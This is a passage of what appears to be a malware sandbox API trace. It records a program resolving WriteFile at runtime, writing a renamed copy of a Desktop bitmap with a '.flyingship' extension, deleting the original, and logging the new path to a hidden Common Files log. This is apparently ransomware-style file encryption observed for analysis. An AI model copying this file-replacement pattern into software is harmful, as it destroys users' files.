hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.860] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0161.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd588 [0161.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd588, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.861] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0161.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0161.861] WriteFile (in: hFile=0x120, lpBuffer=0xa48008*, nNumberOfBytesToWrite=0x15f5a, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa48008*, lpNumberOfBytesWritten=0x87eae0*=0x15f5a, lpOverlapped=0x0) returned 1 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0161.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.863] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0161.864] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.864] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0161.865] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.865] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0161.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba168, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0161.867] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.867] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.867] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.868] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.868] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", lpFilePart=0x0) returned 0x34 [0161.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x5e8ed40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 0x90af58 [0161.869] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyejktglaf.bmp")) returned 1 [0161.872] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x5e8ed40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 0 [0161.872] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.874] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.875] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.875] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.875] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.875] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.875] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.875] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.875] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.875] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.876] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.876] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0161.876] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.876] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.876] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0161.876] ReadFile (in: hFile=0x120, lpBuffer=0xa48008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa48008*, lpNumberOfBytesRead=0x87f43c*=0x71f, lpOverlapped=0x0) returned 1 [0161.876] ReadFile (in: hFile=0x120, lpBuffer=0xa48008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa48008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0161.876] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x71f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.876] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa58010 | out: hHeap=0x8a0000) returned 1 [0161.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp\r\n", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0161.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp\r\n", cchWideChar=66, lpMultiByteStr=0x9aa4f8, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp\r\n", lpUsedDefaultChar=0x0) returned 66 [0161.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0161.877] WriteFile (in: hFile=0x120, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x41, lpOverlapped=0x0) returned 1 [0161.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.877] CloseHandle (hObject=0x120) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa48008 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 